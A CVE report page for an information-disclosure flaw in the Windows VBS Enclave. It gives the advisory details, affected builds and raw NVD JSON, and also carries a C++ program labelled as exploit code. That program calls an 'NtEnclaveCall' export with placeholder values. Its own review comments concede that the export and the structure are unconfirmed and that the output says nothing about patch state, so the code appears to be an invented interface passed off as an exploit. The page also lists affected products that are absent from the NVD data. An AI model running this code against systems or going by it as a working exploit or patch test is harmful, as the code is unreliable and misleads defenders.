Security Vulnerability Report
CVE-2026-20819 CVSS 5.5 MEDIUM

CVE-2026-20819

Published: 2026-01-13 18:16:09
Last Modified: 2026-01-14 20:33:04

Description

Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* - VULNERABLE (builds before 10.0.22631.6491)
cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:* - VULNERABLE (builds before 10.0.26100.7623)
cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:* - VULNERABLE (builds before 10.0.26200.7623)
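Also listed on this page, but absent from the NVD configuration data in the Raw JSON section (confirm against the vendor advisory before relying on it):
Windows 10 1809-22H2
Windows 11 21H2-22H2
Windows Server 2019-2022
Windows VBS Enclave (all versions with VBS enabled)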

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
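// CVE-2026-20819 PoC - VBS Enclave Information Disclosure
// Compile: cl.exe /EHsc /O2 poc.cpp
//
// What this program does: it looks up an export named "NtEnclaveCall" in
// ntdll.dll, calls it once with fixed placeholder values, and prints the
// returned NTSTATUS.
//
// NOTE(review): the structure and the function-pointer type below are
// declared locally in this file, not taken from an SDK header. The page does
// not establish that ntdll.dll exports this name or that the structure
// matches any real enclave call interface -- confirm before drawing any
// conclusion from a run.
//
// NOTE(review): neither outcome of this program shows whether a host is
// patched. Patch state is read from the OS build: the NVD data on this page
// lists builds below 10.0.22631.6491 (Windows 11 23H2), 10.0.26100.7623
// (24H2) and 10.0.26200.7623 (25H2) as vulnerable.
#include <windows.h>
#include <winbase.h>
#include <stdio.h>

// VBS Enclave related structures (locally declared, see NOTE above)
typedef struct _VBS_ENCLAVE_CALL_INPUT {
    DWORD FunctionId;
    PVOID UntrustedPointer;
    SIZE_T PointerSize;
} VBS_ENCLAVE_CALL_INPUT, *PVBS_ENCLAVE_CALL_INPUT;

// NtEnclaveCall - prototype assumed by this file (locally declared)
typedef NTSTATUS(NTAPI* PFN_NT_ENCLAVE_CALL)(
    DWORD EnclaveCallType,
    PVOID InputData,
    DWORD InputDataLength,
    PVOID* OutputData,
    PDWORD OutputDataLength
);

int main(void)
{
    printf("[*] CVE-2026-20819 VBS Enclave Information Disclosure PoC\n");
    printf("[*] Target: Windows VBS Enclave Untrusted Pointer Dereference\n\n");

    // GetModuleHandleW only returns the handle of the already-mapped
    // ntdll.dll; nothing is loaded here.
    HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll");
    if (!hNtdll) {
        printf("[-] Failed to load ntdll.dll\n");
        return 1;
    }

    PFN_NT_ENCLAVE_CALL NtEnclaveCall = (PFN_NT_ENCLAVE_CALL)GetProcAddress(
        hNtdll, "NtEnclaveCall"
    );
    if (!NtEnclaveCall) {
        // A missing export says nothing about whether VBS is enabled, so the
        // message no longer suggests that it does.
        printf("[-] NtEnclaveCall export not found in ntdll.dll\n");
        return 1;
    }
    printf("[+] NtEnclaveCall function located\n");

    // The original declared two unused locals and printed "Checking VBS
    // status..." without performing any check; both are removed so the output
    // does not claim a check that never ran.

    // Fixed placeholder values: an arbitrary function id and a pointer that
    // is not expected to be mapped.
    VBS_ENCLAVE_CALL_INPUT maliciousInput = {0};
    maliciousInput.FunctionId = 0x41414141;              // Arbitrary function ID
    maliciousInput.UntrustedPointer = (PVOID)0xDEADBEEF; // Invalid pointer
    maliciousInput.PointerSize = 0x1000;

    PVOID outputData = NULL;
    DWORD outputDataLength = 0;

    printf("[*] Triggering VBS Enclave call with untrusted pointer...\n");
    printf("[*] Pointer Address: 0x%p\n", maliciousInput.UntrustedPointer);

    NTSTATUS status = NtEnclaveCall(
        0, // EnclaveCallType
        &maliciousInput,
        sizeof(maliciousInput),
        &outputData,
        &outputDataLength
    );

    // Same test as NT_SUCCESS(status); written out because the headers
    // included above may not define that macro (TODO confirm for the SDK in
    // use).
    if (status >= 0) {
        // A success status alone is not evidence that data was disclosed.
        printf("[+] Enclave call returned success (status alone does not show disclosure)\n");
        // DWORD is unsigned long: print with %lu, not %d.
        printf("[+] Output Data: 0x%p, Length: %lu\n",
               outputData, (unsigned long)outputDataLength);
    } else {
        // NTSTATUS is a signed long: cast so the argument matches %lX.
        printf("[-] Enclave call failed with status: 0x%08lX\n",
               (unsigned long)status);
        // A failure status is not evidence of a patch either.
        printf("[*] A failure status does not show patch state; compare the OS build with the advisory\n");
    }

    printf("\n[*] PoC execution completed\n");
    printf("[*] For full exploitation, additional kernel debugging may be required\n");
    return 0;
}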

References

Raw JSON Data

{"cve": {"id": "CVE-2026-20819", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:08.983", "lastModified": "2026-01-14T20:33:03.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to disclose information locally."}, {"lang": "es", "value": "Desreferencia de puntero no confiable en el enclave de Seguridad Basada en Virtualización (VBS) de Windows permite a un atacante autorizado divulgar información localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-822"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6491", "matchCriteriaId": "8D675DAA-4DCE-4727-BE5F-C954BBD252C4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7623", "matchCriteriaId": "D249551B-1433-4E5E-A587-40F782E91E09"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7623", "matchCriteriaId": "22082D4E-E68F-4E48-98FB-42DFDEE2E2A8"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20819", "source": "[email protected]", "tags": 
["Vendor Advisory"]}]}}